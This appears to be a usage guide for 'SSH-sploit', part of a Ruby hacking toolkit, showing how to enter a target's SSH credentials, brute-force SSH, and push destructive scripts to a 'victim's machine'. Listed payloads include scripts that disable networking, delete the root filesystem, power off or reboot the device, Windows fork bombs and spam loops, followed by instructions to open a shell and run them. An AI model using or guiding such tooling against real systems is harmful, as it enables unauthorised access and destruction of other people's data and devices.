

▄▄▄  ▄▄▄ .·▄▄▄▄  ▄▄▄   ▄▄▄· ▄▄▄▄· ▄▄▄▄· ▪  ▄▄▄▄▄ ▌ ▐·
▀▄ █·▀▄.▀·██▪ ██ ▀▄ █·▐█ ▀█ ▐█ ▀█▪▐█ ▀█▪██ •██  ▪█·█▌
▐▀▀▄ ▐▀▀▪▄▐█· ▐█▌▐▀▀▄ ▄█▀▀█ ▐█▀▀█▄▐█▀▀█▄▐█· ▐█.▪▐█▐█•
▐█•█▌▐█▄▄▌██. ██ ▐█•█▌▐█ ▪▐▌██▄▪▐███▄▪▐█▐█▌ ▐█▌· ███ 
.▀  ▀ ▀▀▀ ▀▀▀▀▀• .▀  ▀ ▀  ▀ ·▀▀▀▀ ·▀▀▀▀ ▀▀▀ ▀▀▀ . ▀  
---------------------------------------------------------









lets work on the hardest script and the longest process in RR5 this is 

SSH-possession with SSH-sploit

keep in mind i tried to make this as obvious and easy to use as possible 

Virus sploit is built into ruby and uses pure ruby code to connect and send commands 

over SSH, ofc this isnt going to be a direct console to the host this is rather 

just a small script to send viruses and brute force the SSH or attempt to execute it 

** WARNING: THE VIRUSES USED TO SEND TO THE VCTIMS MACHINE ARE DANGEROUS DO NOT EXECUTE 
   THEM WHILE IN SSH SPLOIT, DO IT IN A SSH CONSOLE!!!!

   YOU HAVE BEEN WARNED
** 

how do you properly run RR5 with SSh sploit 

RR5 has built in 3 command line arguments that can be taken for SSH sploit this will 

be run as an example, i have my rasberry pi setup with an ssh port on a class 3 IP address 

of 10.0.0.90, with password123, and the name is pi 

so I want to use SSH sploit in ruby to well obviously attack my rpi so i run rr5 as the following 

you will not be given any message or desktop notification 

we will be prompted to the RR5 terminal, all we input now is 

SSH-p | Command to initate SSH possession

you will be loaded to the following 

````
device name =>          | This is the device name mine is pi
hostname    =>          | This is the IPA of the rpi
password    =>          | This is the password to the device's SSH 

````

once done you are prompted to the following


``````````

 ______     ______     _____     ______     ______     ______     ______     __     ______  
/\  == \   /\  ___\   /\  __-.  /\  == \   /\  __ \   /\  == \   /\  == \   /\ \   /\__  _\ 
\ \  __<   \ \  __\   \ \ \/\ \ \ \  __<   \ \  __ \  \ \  __<   \ \  __<   \ \ \  \/_/\ \/ 
 \ \_\ \_\  \ \_____\  \ \____-  \ \_\ \_\  \ \_\ \_\  \ \_____\  \ \_____\  \ \_\    \ \_\ 
  \/_/ /_/   \/_____/   \/____/   \/_/ /_/   \/_/\/_/   \/_____/   \/_____/   \/_/     \/_/ 

Version 5.0                            Interactive Console                 Scare_Sec_Hackers                                                                                            
---------------------------------------------------------------------------------------------
                                               ((`\
                                            ___ \\ '--._
                                        .'`   `'    o  )
                                        /    \   '. __.'
                                      _|    /_  \ \_\_
                                     {_\______\-'\__\_\

Virus-Sploit@true>

`````````

then we will go ahead and ask for HELP which can be typed lower or upper as 

HELP || help both work

you get the following 



`````````````````

Virus-Sploit@true>help 

          ____________________________________________________________
          |EXIT           -> Exit the script                         |
          |SEND           -> Send all Viruses-Scripts                |
          |SCRIPTS        -> View all the scripts and how to Execute |
          |EXPORT DISPLAY -> Export the ssh display                  |
          |BRUTE          -> Brute force the ssh device 
          |CLEAR          -> Clears YOU'RE display                   |
          |----------------------------------------------------------|


`````````````````

this will give you different options to do with ssh, when you get here you may be confused 

lets look at the scripts first


here is a list of scripts that will and can be sent/executed on the remote machine
```````````````````
          _____________________________________________________
          |./damage-net.sh | disable net services             |
          |./restart.sh    | Restart the entire device        |
          |./remove.sh     | Removes the entire root system   | 
          |./poweroff.sh   | Powers device off completely     |
          |annoy.py        | will speak OS FUcked on loop     |
          |----------------WINDOWS----------------------------|
          |fork.bat        | forkbomb for win10               |
          |win-1.bat       | does random things idk win-10    | 
          |win-2.bat       | Constantly spams calc exe on loop|
          |---------------------------------------------------|

````````````````````


now lets send them to the host machine


````
Virus-Sploit@true>SEND 
[*] Sending the following scripts

          [+] 1 -> ./damage-net.sh
          [+] 2 -> ./restart.sh
          [+] 3 -> ./remove.sh
          [+] 4 -> ./poweroff.sh
          [+] 5 -> annoy.py
          [+] 6 -> fork.bat
          [+] 7 -> win-1.bat
          [+] 8 -> win-2.bat
          
[sudo] password for ArkAngeL43:
````


if you did not input a host or the host is not up you will get the error 

that the files can not be sent or if you dont get an error and they dont show up 

then it will not properly send to the remote host 

in my case the files didnt exist 

```
cp: cannot stat 'damage-net.sh': No such file or directory
cp: cannot stat 'poweroff.sh': No such file or directory
cp: cannot stat 'restart.sh': No such file or directory
cp: cannot stat 'remove.sh': No such file or directory
cp: cannot stat 'annoyed.py': No such file or directory
cp: cannot stat 'win-1.bat': No such file or directory
cp: cannot stat 'win-2.bat': No such file or directory
cp: cannot stat 'fork.sh': No such file or directory
cp: cannot stat 'fork.bat': No such file or directory
```

when the files do exist you will get no output and instead at the bottom get the following msg


```
[+] Files sent using ssh service 
Virus-Sploit@true>

````

once done you can spawn a shell to the remote host using the ssh service and

then execute the following scripts on their machine that was shown above

****************